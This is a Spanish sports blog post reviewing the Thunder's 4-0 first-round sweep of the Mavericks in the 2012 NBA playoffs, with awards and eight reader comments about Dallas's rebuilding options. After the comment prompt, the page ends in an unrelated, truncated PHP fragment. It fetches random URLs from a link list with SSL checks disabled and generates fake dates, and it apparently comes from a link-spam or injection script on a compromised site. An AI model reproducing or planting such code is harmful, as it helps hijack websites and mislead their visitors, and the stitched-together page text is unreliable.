Resumen Thunder 4 – Mavericks 0

07 de May de 2012 por TheDeerHunter

Análisis previo de la eliminatoria.
kdmavs

Se veía venir. Todo aquel que haya estado al tanto de la trayectoria de ambos equipos este curso tenía en mente una eliminación rápida de Mavs. Podíamos acogernos a aquello del “corazón del campeón”, a la capacidad y experiencia de Nowitzki y compañía o al estado de Harden para alargar la eliminatoria, pero quien más y quien menos era consciente que cualquier cosa que no hubiera terminado en victoria más o menos cómoda de Thunder hubiera supuesto una sorpresa mayúscula.

De todas formas, no por esperado el resultado ha sido tan evidente como parece. Históricamente no es nada frecuente que un campeón caiga en primera ronda con barrida. Igual que el año pasado el 4-1 para Dallas tuvo un punto de engañoso, también lo ha tenido éste. A excepción del tercer partido, la diferencia media han sido poco más de 3 puntos. Fue prácticamente un milagro que los Mavs no lograran robar la ventaja de campo en Oklahoma, y esa posibilidad bien podría haber alterado decisivamente la eliminatoria.

Se puede analizar lo ocurrido desde distintos puntos de vista, pero al final el mejor resumen de la serie lo daba el propio Nowitzki. Los Thunder han puesto encima de la mesa muchas más armas que los Mavs. Un día Westbrook, el otro Durant, al siguiente Harden. En Dallas, el alemán o nada. En contraposición al brillante juego colectivo del año pasado, duele ver el 29% de Vince Carter, la decepcionante producción de Terry…

Por el contrario, mientras el año pasado se señaló a Russell Westbrook como uno de los grandes culpables del descalabro, en esta serie se ha mostrado como el puñal que ha sido todo el curso. Vital también el paso delante de Harden. El año pasado, en la final de conferencia, anotaron entre ambos menos de 25 puntos por partido. Ahora han sumado 40. La aportación de los Collison, Fisher, Perkins y Sefolosha supone también una gran diferencia a la profundidad de banco con el que contaban antaño.

dirkthunderPREMIOS

MVP: Muy bien todo el mundo, pero el capo sigue siendo Durantula. Números completitos: 26.5 ppp, 7.5 rebotes, 3.8 asistencias, 1.75 tapones y 1 robo de postre, a los que añadió un buzzer beater decisivo. Esto es lo que se dice marcar diferencias.

La sorpresa: ‘Momento Playoffs’ es igual a ‘momento Fisher’. Ha pasado, con idéntico número de minutos, de anotar 5.6 puntos a un 8.3. De un 37% de acierto al 58%.

La decepción: No es que hubiera habido mucha gente que verdaderamente esperara grandes cosas de Vince Carter a estas alturas. Quizás que si estás metiendo menos de un tercio de tus tiros te prodigues menos que gente como Jason Terry.

El mayor esfuerzo en vano: No ha sido la eliminatoria más brillante de Dirk Nowitzki, pero aun así se ha ido a los 27 puntos de promedio. Demasiado solo como para evitar las defensas múltiples.

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    4-0, acerté!! jeje. Merendola al sol y en una semanita resuelto… Realmente, Thunder olvidan su abril horribilis y se postulan de nuevo al campeonato. Creo que Lakers sucumbirá contra ellos, pues sin ventaja de campo lo van a tener dificilísimo. Thunder@Spurs va a ser una final complicadísima de predecir. No obstante, sigo viendo a Spurs por encima de cualquier equipo de la NBA, salvo que Lebron opine lo contrario, claro está…

    Ahora qué le queda a Mavs? Esperar a Nash? No sé si eso resolverá todo, incluso, no sé si es el mejor lugar al que Nash debe ir, realmente. Tal y como tienen configurada su plantilla, Mavericks debería comenzar una reconstrucción lo antes posible, porque aun obteniendo a Nash, tendrían un gran juego de bases junto a Terry y Kidd, pero los problemas en la zona seguirán. La pregunta es, qué puede ofrecer Dallas a cualquier equipo para obtener cualquier cosa? Y la respuesta es Nowitzki. Y si quieres a Nash y Nowitzki juntos y depender de unos pívots a mi juicio limitadísimos, en los cuales no veo un progreso real para ser respetables en la defensa del equipo, tus posibilidades de anillo se quedan cojas de nuevo. Qué solución les veis a esta gente?

      Citar

  2. MagicJohnson32 dice:
    #2

    El 4-0 no hace justicia a los Mavs, que jugaron dos partidos excelentes en OKC, con un Marion tremendo en defensa y en ataque y un buen Terry. Ambos desaparecieron en los dos últimos, y nadie más salió al paso para ayudar a Dirk. De todos modos, aunque hubiesen ganado uno de aquellos dos primeros partidos, cuesta imaginar que estos Mavs habrían sido capaces de superar a los Thunder.

    Va a ser un verano interesante en Dallas. Terry y Kidd son agentes libres; los Mavs tienen team options sobre Odom y Carter, que probablemente no seguirán, y solo Dirk, Marion, Haywood, Beaubois y Dominique Jones tienen contrato garantizado. Puede que llegue Deron pero Cuban tiene mucho trabajo por delante.

      Citar

  3. Esteban dice:
    #3

    mi analisis era un 4-1, esperaba que al menos los mavs ganaran un partido de local, y anoche estuvieron cerca, pero en fin,desp de probada la gloria tener un año con tantos altibajos, la moral cae al piso

    un año malo, un año desperdiciado para dirk, pero necesario, aun con chandler, barea y stevenson, con terry y marion en este nivel, los mavs no hubiesen peleado el titulo, y estarian atados a los contratyos de dirk, chandler y barea

    ahora a pensar en wel prox año, me suena que convenceran a deron, y si le aplican la anmistia a okafor tamb iran por el, y un nuevo sexto hombre, luis williams o o.j. mayo

    rejuvenecimiento

      Citar

  4. Esteban dice:
    #4

    MagicJohnson32:
    El 4-0 no hace justicia a los Mavs, que jugaron dos partidos excelentes en OKC, con un Marion tremendo en defensa y en ataque y un buen Terry. Ambos desaparecieron en los dos últimos, y nadie más salió al paso para ayudar a Dirk. De todos modos, aunque hubiesen ganado uno de aquellos dos primeros partidos, cuesta imaginar que estos Mavs habrían sido capaces de superar a los Thunder.

    Va a ser un verano interesante en Dallas. Terry y Kidd son agentes libres; los Mavs tienen team options sobre Odom y Carter, que probablemente no seguirán, y solo Dirk, Marion, Haywood, Beaubois y Dominique Jones tienen contrato garantizado. Puede que llegue Deron pero Cuban tiene mucho trabajo por delante.

    desp de lo mostrado este año haywodd creo que se gano la anmistia, aunque lo grandotes por malos que sean siempre son bienvenidos, asi q quiza puiedan traspasarlo, aunque yo prefiero esos 7 millones mas de espacio en el tope

      Citar

  5. MagicJohnson32 dice:
    #5

    La cuestión es que con la amnistía no conseguirían más espacio, porque le tendrían que seguir pagando. Eso sí, se ahorrarían la parte correspondiente a su salario en el impuesto de lujo.

      Citar

  6. HisRoyalAirness dice:
    #6

    Pues yo creo que Cuban va a hacer una catársis. De Nash nada, veo a Deron muy dentro de Dallas. Antes de su renovación también veía a Howard pero ahora está difícil, salvo que se pueda hacer algo con la trade exception de Lamar.
    Dirk ha demostrado que aún le quedan unos años, puede que reboteando menos pero esa muñequita y esa pata coja son demoledoras. Si tiene a un compañero, o 2, que supongan una amenaza real y a los que tengan que hacer dobles marcajes el alemán es un asesino (aún sin ellos lo es).

    Con respecto a OKC sigo teniendo muchas dudas. Creo que la pintura de Lakers va a ponerles contra las cuerdas y creo que el principal motivo de esta barrida es la diferencia de edad y físico. A poco que los de L.A. cuiden su defensa en transición y carguen con fuerza el rebote ofensivo para evitar las contras creo que puede ser una eliminatoria muy abierta. La pizarra de Brooks me sigue dejando mucho que desear

      Citar

  7. Esteban dice:
    #7

    Si ahorra espacio, se le sigue pagando pero no figura en el espacio hasta donde yo se

      Citar

  8. GreenPride dice:
    #8

    Bueno pues eliminatoria un tanto engañosa en cuanto a su resultado final, que no en cuanto a su ganador. Yo siempre pensé que la experiencia de los Mavs les daría 1 o 2 partidos y la verdad es que 3 de los 4 partidos fueron super-igualados y se los pudieron llevar los Mavs. La clave de la barrida en vez de una eliminatoria más igualada ha sido el buen hacer de los Thunder en el clutch. Ahí han dejado a un lado los erráticos tiros de Westbrook del año pasado para dar el balón a Harden y usar a Westbrook y Durantula de brazo ejecutor si este doblaba el balón. Sin duda el trío Harden-Westbrook-Durant es muy difícil de parar y los Mavs finalmente no pudieron ganar ningún partido. Dirk ha jugado una serie bastante buena aunque no al nivel increíble del año pasado y el resto han estado todos un punto por debajo de lo que necesitaban o 2 (Carter, Haywood).
    En Dallas ya se sabía que este era un año de transición, más aún con el año sabático que se ha tomado Odom. Ahora Cuban tiene todo el espacio del mundo para intentar rodear a Dirk de un equipo que pueda asaltar el título de nuevo. Yo creo que llegará Deron, pero para eso necesitarán que el resto de fichajes sean competitivos para convencerle. Creo que el plan de Cuban era Deron+Howard pero con la renovación de este ya veremos si le acaba saliendo, yo aún no lo descarto. Interesante verano en Dallas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>